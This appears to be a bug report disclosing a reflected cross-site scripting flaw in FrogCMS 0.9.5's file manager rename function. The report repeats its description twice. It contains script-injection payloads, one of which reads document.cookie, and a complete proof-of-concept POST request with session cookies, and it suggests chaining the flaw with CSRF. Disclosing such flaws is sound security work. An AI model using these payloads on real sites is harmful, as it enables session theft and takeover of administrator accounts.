I have found a reflected Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
In the document management office, create new directory test1:
Files-->test1
payload:"/><script>alert(9527)</script>
Modify the directory test1 name,adding a payload at the directory causes directory errors to trigger cross-site scripting。
i think you can see the following picture to konw more.
I have found a reflected Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
In the document management office, create new directory test1:
Files-->test1
payload:"/><script>alert(9527)</script>
Modify the directory test1 name,adding a payload at the directory causes directory errors to trigger cross-site scripting。
i think you can see the following picture to konw more.
POC:
POST /FrogCMS1/admin/?/plugin/file_manager/rename HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=131iv8tkh2ddt13m5vm7dd9sd7; frog_auth_user=exp%3D1526631381%26id%3D1%26digest%3Dca43be6ff340d03eaa08eeee29a77658
Connection: close
Upgrade-Insecure-Requests: 1
file%5Bcurrent_name%5D=test1"/><script>alert(9527)</script>&file%5Bnew_name%5D=test1&commit=Rename
payload:"/><script>alert(document.cookie)</script>
Can be used in conjunction with csrf.
Affected Version:
0.9.5
The text was updated successfully, but these errors were encountered: